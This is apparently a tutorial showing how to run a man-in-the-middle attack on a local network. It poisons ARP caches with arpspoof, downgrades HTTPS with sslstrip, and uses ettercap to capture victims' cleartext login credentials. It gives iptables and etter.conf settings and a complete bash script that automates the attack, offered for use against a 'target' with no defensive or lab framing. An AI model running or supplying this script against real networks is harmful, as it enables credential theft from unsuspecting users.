Man-in-the-middle (MITM) attacks are an effective way to capture data flowing between a target and the router. In a nutshell, the attacker places himself between the target and the router so that all data flows through the attacker's machine. The target thinks he's communicating with the router, and the router thinks it's communicating with the target, when in reality, they are communicating with the attacker and the attacker just relays the information back and forth. It's like a malicious mailman who reads your letters before sealing them and sending them off.
Using a combination of tools readily available online such as
arpspoof, ettercap, and sslsniff, we can capture a user's login credentials and trick them into thinking that they are logging in through an encrypted connection.We'll use
arpspoof to poison the ARP cache between the target and the router. This tells the router that we're the target, and tells the target that we're the router. Next we setup firewall rules to redirect connections to port 80 (HTTP) to port 10000 (the port sslstrip will be listening on). Next, run sslstrip to wait for incoming connections. sslstrip will receive the target's requests to login to the server and will create its own SSL connection with the server and relay the information back and forth. The end result is the server thinking everything is encrypted and fine, and the target not having an encrypted connection at all. Finally, run ettercap to sniff for incoming connections and print the cleartext login credentials to the screen.Some changes need to be made to the
etter.conf file for this to work, specifically the ec_uid, ec_gid, redir_command_on, and redir_command_off. Update them accordingly so they look like this: ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport
You can also create an alternative
etter.conf file with these changes if you don't want to mess with your existing etter.conf. You can pass the alternative configuration to ettercap using the -a flag. Here's the script that combines all the commands necessary to setup the attack. I'm using BackTrack Linux 4RT2 for this setup:
#!/bin/bash
function cleanup {
echo "* cleaning up"
killall sslstrip
iptables -t nat -D PREROUTING 1
killall arpspoof
echo 0 > /proc/sys/net/ipv4/ip_forward
exit 0
}
if [[ $# -ne 3 ]]; then
echo "usage: `basename $0` target1 target2 interface"
exit 0
fi
trap cleanup INT
echo "* enabling IPv4 forwarding"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "* ARP spoofing between $1 and $2"
arpspoof -i $3 -t $1 $2 > /dev/null 2>&1 &
echo "* setup iptables rules"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo "* starting sslstrip"
sslstrip -a -f -k &
echo "* starting ettercap"
# use alternative etter.conf file: e.conf
ettercap -T -q -a ./e.conf -i $3
Wait for the target to navigate to HTTP login sites and enter their credentials and watch
ettercap print them to the screen. To quit the script, just hit CTRL-C and it will cleanup after itself.